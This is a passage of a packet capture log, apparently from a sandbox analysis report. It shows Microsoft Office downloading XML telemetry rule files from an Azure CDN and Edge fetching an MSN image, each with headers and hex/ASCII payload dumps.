</S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.5	49889	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:29 UTC	192	OUT	GET /rules/rule120657v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:29 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:29 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT ETag: "0x8DC582B9FF95F80" x-ms-request-id: 6a120a4b-401e-0078-724b-2e4d34000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035529Z-15869dbbcc6lq45jhC1DFWbkc800000005xg000000005msd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:29 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.5	49897	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:30 UTC	192	OUT	GET /rules/rule120664v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:30 GMT Content-Type: text/xml Content-Length: 502 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6A0D312" x-ms-request-id: 6a686a66-001e-0028-06b2-31c49f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035530Z-17df447cdb5lrwcchC1DFWphes00000008eg000000008v6d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:30 UTC	502	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.5	49899	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:30 UTC	192	OUT	GET /rules/rule120666v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:30 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3F48DAE" x-ms-request-id: 6dc34679-101e-0034-7d01-2d96ff000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035530Z-16547b76f7ftdm8dhC1DFWs13g0000000c50000000002aav x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:30 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.5	49900	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:30 UTC	192	OUT	GET /rules/rule120667v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:30 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:30 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BB9B6040B" x-ms-request-id: 2f2a95d3-901e-00ac-5b08-2cb69e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035530Z-16547b76f7fnlcwwhC1DFWz6gw0000000c6000000000c57f x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:30 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.5	49901	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:30 UTC	192	OUT	GET /rules/rule120668v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:30 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3CAEBB8" x-ms-request-id: 7b98c591-e01e-0099-809c-31da8a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035530Z-15869dbbcc6khw88hC1DFWbb2000000005xg000000006aer x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:30 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.5	49898	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:30 UTC	192	OUT	GET /rules/rule120665v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:30 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:30 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D30478D" x-ms-request-id: 162cf1ac-401e-002a-0c09-2dc62e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035530Z-16547b76f7f7rtshhC1DFWrtqn0000000c3000000000ev2g x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:30 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.5	49902	23.192.223.200	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:30 UTC	506	OUT	GET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-10 03:55:30 UTC	548	IN	HTTP/1.1 200 OK Last-Modified: Mon, 21 Oct 2024 03:13:18 GMT Access-Control-Allow-Origin: * X-Datacenter: northeu X-ActivityId: 83ecbb09-4802-4ec5-ab24-148044d0ab86 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Type: image/jpeg Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t X-Source-Length: 822 Content-Length: 4096 Cache-Control: public, max-age=256659 Expires: Wed, 13 Nov 2024 03:13:09 GMT Date: Sun, 10 Nov 2024 03:55:30 GMT Connection: close
2024-11-10 03:55:30 UTC	4096	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff c0 00 11 08 00 a8 00 a8 03 01 11 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa 01 00 03 01 Data Ascii: JFIF``}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.5	49903	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:31 UTC	192	OUT	GET /rules/rule120669v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:31 UTC	498	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:31 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB5284CCE" x-ms-request-id: b521bdd1-401e-002a-2116-32c62e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035531Z-15869dbbcc6lxrkghC1DFWqpdc00000004gg0000000023f9 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-11-10 03:55:31 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.5	49904	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:31 UTC	192	OUT	GET /rules/rule120670v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:31 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:31 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91EAD002" x-ms-request-id: b293b438-201e-003f-6baa-306d94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035531Z-17df447cdb5fh5hghC1DFWam0400000005c000000000kn4t x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:31 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.5	49906	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:31 UTC	192	OUT	GET /rules/rule120671v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:31 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:31 GMT Content-Type: text/xml Content-Length: 432 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT ETag: "0x8DC582BAABA2A10" x-ms-request-id: ac2c2f15-301e-0020-0960-326299000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035531Z-17df447cdb59mt7dhC1DFWqpg400000008gg0000000002ep x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-10 03:55:31 UTC	432	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.5	49907	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:31 UTC	192	OUT	GET /rules/rule120672v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:31 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:31 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA740822" x-ms-request-id: d4913e6b-901e-0029-0593-31274a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035531Z-17df447cdb5c9wvxhC1DFWn08n00000008ng00000000fe4t x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:31 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.5	49908	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:31 UTC	192	OUT	GET /rules/rule120673v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:31 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:31 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT ETag: "0x8DC582BB464F255" x-ms-request-id: 44d502e9-701e-000d-5c08-2c6de3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035531Z-16547b76f7fkcrm9hC1DFWxdag0000000c9g000000001snb x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
